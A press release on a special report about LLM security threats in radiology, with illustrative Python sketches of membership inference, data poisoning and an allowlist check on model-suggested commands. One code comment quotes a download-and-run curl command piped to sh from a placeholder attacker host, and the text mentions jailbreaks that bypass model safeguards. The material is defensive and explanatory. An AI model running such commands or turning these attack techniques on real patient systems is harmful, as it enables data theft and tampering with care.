Special report highlights LLM cybersecurity threats in radiology

May 14, 2025
OAK BROOK, Ill. — In a new special report, researchers address the cybersecurity challenges of large language models (LLMs) and the importance of implementing security measures to prevent LLMs from being used maliciously in the health care system. The special report was published today in Radiology: Artificial Intelligence, a journal of the Radiological Society of North America (RSNA).

LLMs, such as OpenAI's GPT-4 and Google's Gemini, are a type of artificial intelligence (AI) that can understand and generate human language. LLMs have rapidly emerged as powerful tools across various health care domains, revolutionizing both research and clinical practice. These models are being employed for diverse tasks such as clinical decision support, patient data analysis, drug discovery and enhancing communication between health care providers and patients by simplifying medical jargon. An increasing number of health care providers are exploring ways to integrate advanced language models into their daily workflows.

"While integration of LLMs in health care is still in its early stages, their use is expected to expand rapidly," said lead author Tugba Akinci D'Antonoli, M.D., neuroradiology fellow in the Department of Diagnostic and Interventional Neuroradiology, University Hospital Basell, Switzerland. "This is a topic that is becoming increasingly relevant and makes it crucial to start understanding the potential vulnerabilities now."

LLM integration into medical practice offers significant opportunities to improve patient care, but these opportunities are not without risk. LLMs are susceptible to security threats and can be exploited by malicious actors to extract sensitive patient data, manipulate information or alter outcomes using techniques such as data poisoning or inference attacks.
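
To make the inference-attack risk concrete, consider the minimal sketch below. It is illustrative only and is not drawn from the report: a toy scikit-learn classifier stands in for a deployed clinical model, and synthetic data stands in for patient records. Records a model was trained on tend to receive higher confidence scores than unseen records, and a membership inference attacker exploits exactly that gap to guess whether a particular patient's record was used for training.

import numpy as np
from sklearn.datasets import make_classification
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split

# Synthetic stand-in for tabular patient data; no real records are involved.
X, y = make_classification(n_samples=2000, n_features=20, random_state=0)
X_member, X_outside, y_member, y_outside = train_test_split(
    X, y, test_size=0.5, random_state=0
)

# "Deployed" model, trained only on the member half of the data.
model = LogisticRegression(max_iter=1000).fit(X_member, y_member)

def true_label_confidence(model, X, y):
    # Probability the model assigns to each record's true label.
    return model.predict_proba(X)[np.arange(len(y)), y]

# Training (member) records typically score higher than unseen records;
# an attacker thresholds this score to guess membership.
print("mean confidence on training records:", true_label_confidence(model, X_member, y_member).mean())
print("mean confidence on unseen records:  ", true_label_confidence(model, X_outside, y_outside).mean())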

AI-inherent vulnerabilities and threats range from data poisoning, in which intentionally wrong or malicious information is inserted into the model's training data, to attacks that bypass a model's internal safeguards designed to prevent restricted output, resulting in harmful or unethical responses.
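
The first of these threats, data poisoning, can be sketched in the same simplified way (again illustrative, not from the report): if an attacker silently relabels a fraction of the training examples, the model retrained on that data systematically misses cases it would otherwise catch.

import numpy as np
from sklearn.datasets import make_classification
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import recall_score
from sklearn.model_selection import train_test_split

# Synthetic stand-in for training data; label 1 plays the role of a
# hypothetical "finding present" class.
X, y = make_classification(n_samples=2000, n_features=20, random_state=1)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=1)

# Poisoning step: assume the attacker flips 40% of the positive training
# labels to negative before the model is retrained.
rng = np.random.default_rng(1)
positives = np.where(y_train == 1)[0]
flipped = rng.choice(positives, size=int(0.4 * len(positives)), replace=False)
y_poisoned = y_train.copy()
y_poisoned[flipped] = 0

clean_model = LogisticRegression(max_iter=1000).fit(X_train, y_train)
poisoned_model = LogisticRegression(max_iter=1000).fit(X_train, y_poisoned)

# The poisoned model under-detects the positive class on held-out data.
print("recall on positives, clean training data:   ", recall_score(y_test, clean_model.predict(X_test)))
print("recall on positives, poisoned training data:", recall_score(y_test, poisoned_model.predict(X_test)))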

Non-AI-inherent vulnerabilities extend beyond the model and typically involve the ecosystem in which LLMs are deployed. Attacks can lead to severe data breaches, data manipulation or loss, and service disruptions. In radiology, an attacker could manipulate image analysis results, access sensitive patient data or even install arbitrary software.
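
One way to picture a deployment-level safeguard against that last scenario is to treat everything the model returns as untrusted input before it can touch the rest of the system. The sketch below is purely illustrative; call_llm and the allowed tool names are hypothetical and are not taken from the report.

import shlex

# Hypothetical allowlist of tools an imaging pipeline is permitted to invoke.
ALLOWED_COMMANDS = {"dcmdump", "dcm2niix"}

def call_llm(prompt: str) -> str:
    # Placeholder for a real model call. An attacker who can influence the
    # prompt, the model, or its retrieved context could make this return
    # something like "curl https://evil.example/payload.sh | sh".
    return "dcmdump study_001.dcm"

def validate_suggestion(suggestion: str) -> list[str]:
    # Parse the model's output and refuse anything that is not an
    # explicitly allowed tool; never pass it to a shell unchecked.
    parts = shlex.split(suggestion)
    if not parts or parts[0] not in ALLOWED_COMMANDS:
        raise ValueError(f"refusing untrusted command: {suggestion!r}")
    return parts

command = validate_suggestion(call_llm("Suggest a command to inspect this DICOM header."))
print("validated; safe to hand to subprocess.run:", command)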
